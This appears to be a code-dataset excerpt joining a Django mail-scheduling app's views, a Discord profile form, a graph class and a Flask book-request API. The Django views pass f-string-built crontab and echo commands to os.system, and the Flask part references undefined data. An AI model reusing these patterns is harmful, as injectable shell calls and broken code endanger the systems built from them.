{self.object.hour} * * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return super().form_valid(form)\n\n\nclass ConfigMailingUpdateView(UpdateView):\n model = ConfigMailing\n fields = ('title', 'from_email', 'hour', 'minute', 'periodicity', 'mail_dump')\n template_name = 'sender/mailing_update.html'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n\n def form_valid(self, form):\n self.object = form.save()\n user = self.request.user\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {self.object.pk} >> log_cronjobs.txt'''\n os.system(f'''crontab -l | grep -v -F \"{cmd}\" | crontab -''')\n\n if self.object.periodicity == self.model.PERIOD_DAY:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} {self.object.hour} * * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n if self.object.periodicity == self.model.PERIOD_WEEK:\n if self.object.weekdays:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} {self.object.hour} * * {self.object.weekdays} '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n if self.object.periodicity == self.model.PERIOD_MONTH:\n if self.object.monthdates:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} {self.object.hour} {self.object.monthdates} * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('sender:mailing_detail', kwargs={'pk': self.get_object().pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n\nclass UpdatePasswordConfigMailingDetailView(UpdateView):\n model = ConfigMailing\n form_class = PasswordFromEmailForm\n template_name = 'sender/mailing_change_password.html'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse_lazy('sender:mailing_detail', kwargs={'pk': self.get_object().pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n def form_valid(self, form):\n new_password1 = form.data['password_from_email']\n new_password2 = form.data['new_password2']\n\n if new_password1 != new_password2:\n form.add_error('password_from_email', 'The passwords do not match')\n return super().render_to_response(self.get_context_data(form=form))\n\n try:\n send_mail(\n subject='''A user changed the password for their mailing email.''',\n message='''Test message sent when changing a user password''',\n from_email=settings.EMAIL_HOST_USER,\n auth_password=new_password1,\n recipient_list=[Home.objects.all().first().test_email, ]\n )\n except SMTPException as e:\n form.add_error('password_from_email', 'The password for the email address specified in the mailing does not work')\n return super().render_to_response(self.get_context_data(form=form))\n\n else:\n self.object.password_from_email = new_password1\n self.object.save()\n\n return redirect('sender:profile')\n\n\nclass ConfigMailingModeratingListView(ListView):\n model = ConfigMailing\n template_name = 'sender/mailing_list_moderating.html'\n ordering = '-create_at'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_mailing'):\n return 
redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['all_mailings'] = True\n context.update(include_static_context())\n\n return context\n\n\nclass ConfigMailingModeratingDetailView(DetailView):\n model = ConfigMailing\n template_name = 'sender/mailing_detail_moderating.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_mailing'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.get_object().user))\n\n return context\n\n\nclass WeekdayUpdateConfigMailingDetailView(DetailView):\n model = ConfigMailing\n template_name = 'sender/mailing_update_weekday.html'\n form = UpdateWeekdayForm()\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def post(self, form, pk):\n mailing = ConfigMailing.objects.all().get(id=pk)\n\n weekdays = []\n weekdays_text = []\n for val in weekdays_cron_dict:\n try:\n form.POST[val]\n except Exception:\n continue\n else:\n weekdays.append(weekdays_cron_dict[val])\n weekdays_text.append(val)\n\n mailing.weekdays = ','.join(weekdays)\n mailing.weekdays_text = ', '.join(weekdays_text)\n mailing.save()\n\n user = self.request.user\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {mailing.pk} >> log_cronjobs.txt'''\n os.system(f'''crontab -l | grep -v -F \"{cmd}\" | crontab -''')\n\n if mailing.weekdays:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{mailing.minute} {mailing.hour} * * {mailing.weekdays} '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return self.get_success_url()\n\n def get_success_url(self):\n return HttpResponseRedirect(self.get_object().get_absolute_url())\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n\nclass MonthdateUpdateConfigMailingDetailView(DetailView):\n model = ConfigMailing\n template_name = 'sender/mailing_update_monthdate.html'\n form = UpdateMonthdateForm()\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def post(self, form, pk):\n mailing = ConfigMailing.objects.all().get(id=pk)\n\n monthdates = []\n for val in range(1, 32):\n try:\n form.POST[f'{val}']\n except Exception:\n continue\n else:\n monthdates.append(str(val))\n\n mailing.monthdates = ','.join(monthdates)\n mailing.monthdates_text = mailing.monthdates.replace(',', ', ')\n mailing.save()\n\n user = self.request.user\n path_project = 
'/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {mailing.pk} >> log_cronjobs.txt'''\n os.system(f'''crontab -l | grep -v -F \"{cmd}\" | crontab -''')\n\n if mailing.monthdates:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{mailing.minute} {mailing.hour} {mailing.monthdates} * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return self.get_success_url()\n\n def get_success_url(self):\n return HttpResponseRedirect(self.get_object().get_absolute_url())\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n\nclass ConfigMailingDeleteView(DeleteView):\n model = ConfigMailing\n template_name = 'sender/forms/delete_mailing.html'\n success_url = reverse_lazy('sender:profile')\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n def form_valid(self, form):\n user = self.request.user\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {self.object.pk} >> log_cronjobs.txt'''\n os.system(f'''crontab -l | grep -v -F \"{cmd}\" | crontab -''')\n\n return super().form_valid(form)\n\n\nclass RestartConfigMailingDetailView(DetailView):\n model = ConfigMailing\n template_name = 'sender/restart_mailing.html'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().user != self.request.user:\n return redirect('sender:access_error')\n\n obj = super().get_object()\n obj.status = ConfigMailing.STATUS_CREATED\n obj.save()\n context = super().get_context_data(object=obj)\n\n return super().render_to_response(context)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(proxy_mailing_detail.include_user_and_static_context(self.get_object(), self.request.user))\n\n return context\n\n\nclass LetterMailingDetailView(DetailView):\n model = LetterMailing\n template_name = 'sender/letter_detail.html'\n pk_url_kwarg = 'letter_pk'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if self.get_object().user != user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['mailing'] = ConfigMailing.objects.all().get(id=self.get_object().mailing.pk)\n\n return context\n\n\nclass CreateLetterMailingDetailView(DetailView):\n model = ConfigMailing\n form = LetterCreateForm()\n template_name = 'sender/forms/letter_form.html'\n\n def get(self, request, *args, **kwargs):\n 
user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n if user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n context['mailing'] = self.object\n\n return context\n\n def post(self, form, pk):\n LetterMailing.objects.create(\n user=self.request.user,\n mailing=self.get_object(),\n title=form.POST['title'],\n content=form.POST['content'],\n position=form.POST['position']\n )\n return HttpResponseRedirect(self.get_object().get_absolute_url())\n\n\nclass LetterMailingUpdateView(UpdateView):\n model = LetterMailing\n form_class = LetterUpdateForm\n template_name = 'sender/forms/letter_form.html'\n pk_url_kwarg = 'letter_pk'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().mailing.user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse_lazy('sender:mailing_detail', kwargs={'pk': self.get_object().mailing.pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['mailing'] = ConfigMailing.objects.all().get(id=self.get_object().mailing.pk)\n context['letter_exist'] = True\n\n return context\n\n\nclass LetterMailingDeleteView(DeleteView):\n model = LetterMailing\n template_name = 'sender/forms/delete_letter.html'\n pk_url_kwarg = 'letter_pk'\n\n def get(self, request, *args, **kwargs):\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n if self.get_object().mailing.user != self.request.user:\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse_lazy('sender:mailing_detail', kwargs={'pk': self.get_object().mailing.pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['mailing'] = ConfigMailing.objects.all().get(id=self.get_object().mailing.pk)\n\n return context\n\n\nclass TryMailingListView(ListView):\n model = TryMailing\n template_name = 'sender/try_list.html'\n success_url = reverse_lazy('sender:trials')\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n if user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_queryset(self):\n user = self.request.user\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get_queryset().order_by('-date_time_try')\n\n return super().get_queryset().filter(user=self.request.user).order_by('-date_time_try')\n\n\nclass InvalidVerifyTemplateView(TemplateView):\n template_name = 'sender/service/invalid_verify.html'\n\n def get(self, request, *args, **kwargs):\n context = super().get_context_data(**kwargs)\n\n if self.request.user.is_authenticated:\n return 
HttpResponseRedirect(redirect_to_main_page(self.request.user))\n\n return self.render_to_response(context)\n\n\nclass UserListModeratingListView(ListView):\n model = User\n template_name = 'sender/user_list_moderating.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(include_static_context())\n\n return context\n\n\nclass UserCommentModeratingUpdateView(DetailView):\n model = User\n template_name = 'sender/forms/user_comment_form.html'\n form = UserCommentForm()\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n\n return context\n\n def post(self, form, pk):\n obj = User.objects.all().get(id=pk)\n obj.comment = form.POST['comment']\n obj.save()\n\n return redirect('sender:moderating_users')\n\n\nclass MailingBannedUpdateView(UpdateView):\n model = ConfigMailing\n form_class = ConfigMailingBannedForm\n template_name = 'sender/change_ban_status_mailing.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_mailing'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(include_static_context())\n\n return context\n\n def form_valid(self, form):\n obj = super().get_object()\n\n if form.data['banned'] == ConfigMailing.BANNED_FALSE and obj.banned == ConfigMailing.BANNED_FALSE:\n form.add_error('banned', 'Select the BLOCK value')\n\n return super().render_to_response(self.get_context_data(form=form))\n\n if form.data['banned'] == ConfigMailing.BANNED_TRUE and obj.banned == ConfigMailing.BANNED_TRUE:\n form.add_error('banned', 'Select the UNBLOCK value')\n\n return super().render_to_response(self.get_context_data(form=form))\n\n if form.data['banned'] == ConfigMailing.BANNED_FALSE:\n obj = form.save()\n reason_ban = form.data['reason_ban']\n\n try:\n send_mail(\n subject='''Your mailing on the VDchimp site has been unblocked''',\n message=f'''The mailing '{obj.title}' has been unblocked. \\n{reason_ban}. \\nIf you have any questions, you can write to the moderator at {self.request.user.email}''',\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[obj.user.email, ]\n )\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> send_reason_ban_mailing_errors.txt')\n\n return redirect('sender:send_ban_status_error')\n\n else:\n return redirect('sender:moderating_mailings')\n\n if form.data['banned'] == ConfigMailing.BANNED_TRUE:\n obj = form.save()\n reason_ban = form.data['reason_ban']\n\n try:\n send_mail(\n subject='''Your mailing on the VDchimp site has been blocked''',\n message=f'''The mailing '{obj.title}' has been blocked. \\nBan reasons: {reason_ban}. \\nIf you have any questions, you can write to the moderator at {self.request.user.email}''',\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[obj.user.email, ]\n )\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> send_reason_ban_mailing_errors.txt')\n\n return redirect('sender:send_ban_status_error')\n\n else:\n return redirect('sender:moderating_mailings')\n\n\nclass UserBannedUpdateView(UpdateView):\n model = User\n form_class = UserBannedForm\n template_name = 'sender/change_ban_status_user.html'\n success_url = reverse_lazy('sender:moderating_users')\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(include_static_context())\n\n return context\n\n def form_valid(self, form):\n obj = super().get_object()\n\n\n if form.data['banned'] == User.BANNED_FALSE and obj.banned == User.BANNED_FALSE:\n form.add_error('banned', 'Select the BLOCK value')\n\n return super().render_to_response(self.get_context_data(form=form))\n\n if form.data['banned'] == User.BANNED_TRUE and obj.banned == User.BANNED_TRUE:\n form.add_error('banned', 'Select the UNBLOCK value')\n\n return super().render_to_response(self.get_context_data(form=form))\n\n if form.data['banned'] == User.BANNED_FALSE:\n obj = form.save()\n reason_ban = form.data['reason_ban']\n\n try:\n send_mail(\n subject='''You have been unblocked on the VDchimp site''',\n message=f'''\\n{reason_ban}. \\nIf you have any questions, you can write to the moderator at {self.request.user.email}''',\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[obj.email,]\n )\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> send_reason_ban_user_errors.txt')\n\n return redirect('sender:send_ban_status_error')\n\n else:\n return HttpResponseRedirect(self.get_success_url())\n\n if form.data['banned'] == User.BANNED_TRUE:\n obj = form.save()\n reason_ban = form.data['reason_ban']\n\n try:\n send_mail(\n subject='''You have been blocked on the VDchimp site''',\n message=f'''\\nBan reasons: {reason_ban}. \\nIf you have any questions, you can write to the moderator at {self.request.user.email}''',\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[obj.email, ]\n )\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> send_reason_ban_user_errors.txt')\n\n return redirect('sender:send_ban_status_error')\n\n else:\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass PostListContentManagementListView(ListView):\n model = Post\n template_name = 'sender/post_list_content_management.html'\n paginate_by = 12\n ordering = ['-create_at']\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['inactive'] = self.model.STATUS_INACTIVE\n\n return context\n\n\nclass PostListView(ListView):\n model = Post\n template_name = 'sender/post_list.html'\n paginate_by = 12\n ordering = ['-create_at']\n paginate_orphans = 3\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['count_posts'] = self.get_queryset().filter(status=self.model.STATUS_ACTIVE).count()\n context['blog'] = Blog.objects.all().first()\n object_list = cache_blog(Post)\n paginator = Paginator(object_list, 12)\n page_number = self.request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context['page_obj'] = page_obj\n context['paginator'] = paginator\n context['object_list'] = page_obj.object_list\n\n return context\n\n\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'sender/post_detail.html'\n\n def get(self, request, *args, **kwargs):\n super().get(request, *args, **kwargs)\n\n obj = self.get_object()\n context = super().get_context_data(object=obj)\n obj.count_views += 1\n obj.save()\n\n return super().render_to_response(context)\n\n\nclass PostCreateView(CreateView):\n model = Post\n template_name = 'sender/forms/post_form.html'\n form_class = PostForm\n success_url = reverse_lazy('sender:content_management_posts')\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n self.object.user = self.request.user\n self.object.slug = translit.do(self.object.title)\n self.object.change_at = timezone.now()\n self.object.save()\n os.system('redis-cli flushall')\n\n return super().form_valid(form)\n\n\nclass PostUpdateView(UpdateView):\n model = Post\n template_name = 'sender/forms/post_form.html'\n form_class = PostForm\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n self.object.slug = translit.do(self.object.title)\n self.object.change_at = timezone.now()\n self.object.save()\n os.system('redis-cli flushall')\n\n return 
super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('sender:content_management_posts')\n\n\nclass PostDeleteView(DeleteView):\n model = Post\n template_name = 'sender/forms/delete_post.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_success_url(self):\n return reverse_lazy('sender:content_management_posts')\n\n def form_valid(self, form):\n os.system('redis-cli flushall')\n\n return super().form_valid(form)\n\n\nclass BlogUpdateView(UpdateView):\n model = Blog\n template_name = 'sender/forms/blog_form.html'\n form_class = BlogForm\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if not user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_object(self, queryset=None):\n return Blog.objects.first()\n\n def get_success_url(self):\n return reverse_lazy('sender:content_management_posts')\n\n\nclass CustomPasswordChangeView(PasswordChangeView):\n template_name = 'sender/forms/change_password_profile.html'\n model = User\n\n def get_success_url(self):\n return redirect_to_main_page(self.request.user)\n\n\nclass CustomPasswordResetFormView(FormView):\n template_name = 'sender/forms/reset_password_form.html'\n form_class = CustomPasswordResetForm\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if user.is_authenticated:\n return HttpResponseRedirect(redirect_to_main_page(user))\n\n return super().get(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n\n if form.is_valid():\n email = form.cleaned_data.get('email')\n user = User.objects.all().get(email=email)\n new_password = User.objects.make_random_password(length=20)\n user.set_password(new_password)\n user.save()\n\n try:\n custom_send_mail.reset_password(request, email, new_password)\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> password_reset_errors.txt')\n\n return redirect('sender:some_error')\n\n else:\n return redirect('sender:confirm_reset')\n\n context = {'form': form}\n\n return render(request, self.template_name, context)\n\n\nclass ConfirmResetPasswordTemplateView(TemplateView):\n template_name = 'sender/service/after_reset_password.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if user.is_authenticated and user.has_perm('sender.view_and_ban_any_mailing'):\n return HttpResponseRedirect(redirect_to_main_page(user))\n\n return super().get(request, *args, **kwargs)\n\n\nclass UserProfileUpdateView(UpdateView):\n model = User\n form_class = CustomUserEditForm\n template_name = 'sender/forms/edit_profile.html'\n\n def get(self, request, *args, **kwargs):\n super().get(request, *args, **kwargs)\n\n if not self.request.user.is_authenticated:\n return redirect('sender:login')\n\n return self.render_to_response(self.get_context_data())\n\n def get_object(self, queryset=None):\n return self.request.user\n\n def get_success_url(self):\n return redirect_to_main_page(self.request.user)\n\n def form_valid(self, form):\n self.object = form.save()\n self.object.phone = str(self.object.phone).replace('+', '').replace('(', '').replace(')', '').replace('-', 
'').replace(' ', '')\n self.object.save()\n\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass HomeDetailView(DetailView):\n model = Home\n template_name = 'sender/home.html'\n\n def get_object(self, queryset=None):\n return Home.objects.all().first()\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['home'] = Home.objects.all().first()\n context['advantage_list'] = AdvantagesHome.objects.all().filter(status=AdvantagesHome.STATUS_ACTIVE)\n context['db_count_users'] = User.objects.all().count()\n context['db_count_all_mailings'] = ConfigMailing.objects.all().count()\n context['db_count_active_mailings'] = ConfigMailing.objects.all().filter(status=ConfigMailing.STATUS_CREATED)\n context['post_list'] = cache_home_posts(Post)\n\n return context\n\n\nclass ContactsFormView(FormView):\n template_name = 'sender/contacts.html'\n form_class = FeedbackForm\n success_url = reverse_lazy('catalog:after_feedback')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['contacts'] = Contacts.objects.all().get(id=1)\n\n return context\n\n def form_valid(self, form):\n recipients = [x.email for x in User.objects.all().filter(groups__name='Менеджеры')]\n custom_send_mail.feedback(form.data['name'], form.data['email'], form.data['message'], recipients)\n\n return super().form_valid(form)\n\n\ndef error_404(request, exception):\n context = {}\n context['page_title'] = '404'\n response = render(request, 'sender/service/page_404.html', context=context)\n response.status_code = 404\n\n return response\n\n\n","repo_name":"VDexpert/vdchimp","sub_path":"sender/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":44817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74747797584","text":"import discord\nfrom model import profile\nimport asyncio\n\n\nclass Creatprofile(discord.ui.Modal, title=\"profile\"):\n name = discord.ui.TextInput(\n label=\"Name\",\n placeholder=\"Your name here...\",\n )\n\n location = discord.ui.TextInput(\n label=\"Location\",\n style=discord.TextStyle.short,\n placeholder=\"Where are you from\",\n required=False,\n max_length=300,\n )\n\n looking_for = discord.ui.TextInput(\n label=\"looking for\",\n placeholder=\"What are you looking for? Type None if you don't want to share!\",\n )\n\n hobbies = discord.ui.TextInput(\n label=\"hobbies\",\n placeholder=\"What are your hobbies?\",\n )\n\n \n age = discord.ui.TextInput(\n label=\"Age\",\n placeholder=\"Input your age (number only)\",\n )\n \n\n biography = discord.ui.TextInput(\n label=\"biography\",\n placeholder=\"Please write a biography, under 200 characters!\",\n )\n\n async def on_submit(self, interaction: discord.Interaction):\n profile.profile_data(\n str(interaction.user),\n str(interaction.user.id),\n self.name.value,\n self.location.value,\n self.looking_for.value,\n self.hobbies.value,\n self.age.value,\n self.biography.value,\n )\n\n await interaction.response.send_message(f\"profile created\", ephemeral=True)\n await asyncio.sleep(20)\n await interaction.delete_original_response()\n\n async def on_error(\n self, interaction: discord.Interaction, error: Exception\n ) -> None:\n await interaction.response.send_message(\n \"Oops! 
Something went wrong.\", ephemeral=True\n )\n","repo_name":"daveads/discord-profile-bot","sub_path":"view/modal/profile_modal.py","file_name":"profile_modal.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10847582181","text":"class cgraph(object):\n def __init__(self,n,m,graph):\n self.n = n\n self.m = m\n self.graph = graph\n self.visited = [[False for j in i] for i in graph]\n def is_safe(self,i,j):\n return(i>=0 and i=0 and j', methods=['GET'])\ndef get_record_by_id(_id):\n \"\"\"Get book request details by it's id\n @param _id: the id\n @return: 200: a BOOK_REQUESTS as a flask/response object \\\n with application/json mimetype.\n @raise 404: if book request not found\n \"\"\"\n db = pymysql.connect(**config)\n cursor = db.cursor()\n sql = \"SELECT * FROM book_info;\"\n try:\n cursor.execute(sql)\n results = cursor.fetchall()\n \n BOOK_REQUESTS = results\n db.close()\n\n finally:\n if _id not in BOOK_REQUESTS:\n abort(404)\n return jsonify(BOOK_REQUESTS[_id])\n\n\n@REQUEST_API.route('/request', methods=['POST'])\ndef create_record():\n \"\"\"Create a book request record\n @param email: post : the requesters email address\n @param title: post : the title of the book requested\n @return: 201: a new_uuid as a flask/response object \\\n with application/json mimetype.\n @raise 400: misunderstood request\n \"\"\"\n if not request.get_json():\n abort(400)\n data = request.get_json(force=True)\n\n if not data.get('email'):\n abort(400)\n if not validate_email(data['email']):\n abort(400)\n if not data.get('title'):\n abort(400)\n\n new_uuid = str(uuid.uuid4())\n book_request = {\n 'title': data['title'],\n 'email': data['email'],\n 'timestamp': datetime.now().timestamp()\n }\n BOOK_REQUESTS[new_uuid] = book_request\n # save the new book to jason file, further jobs: need to rewrite the file under the formatal style for read it easily. -wayne W\n fo = open(\"./routes/data1.json\", \"w\")\n fo.write( str(json.dumps(json_data)) )\n fo.close()\n # HTTP 201 Created\n return jsonify({\"id\": new_uuid}), 201\n \n\n@REQUEST_API.route('/request/', methods=['PUT'])\ndef edit_record(_id):\n \"\"\"Edit a book request record\n @param email: post : the requesters email address\n @param title: post : the title of the book requested\n @return: 200: a booke_request as a flask/response object \\\n with application/json mimetype.\n @raise 400: misunderstood request\n \"\"\"\n if _id not in BOOK_REQUESTS:\n abort(404)\n\n if not request.get_json():\n abort(400)\n data = request.get_json(force=True)\n\n if not data.get('email'):\n abort(400)\n if not validate_email(data['email']):\n abort(400)\n if not data.get('title'):\n abort(400)\n\n book_request = {\n 'title': data['title'],\n 'email': data['email'],\n 'timestamp': datetime.now().timestamp()\n }\n\n BOOK_REQUESTS[_id] = book_request\n # save the new book to jason file, further jobs: need to rewrite the file under the formatal style for read it easily. 
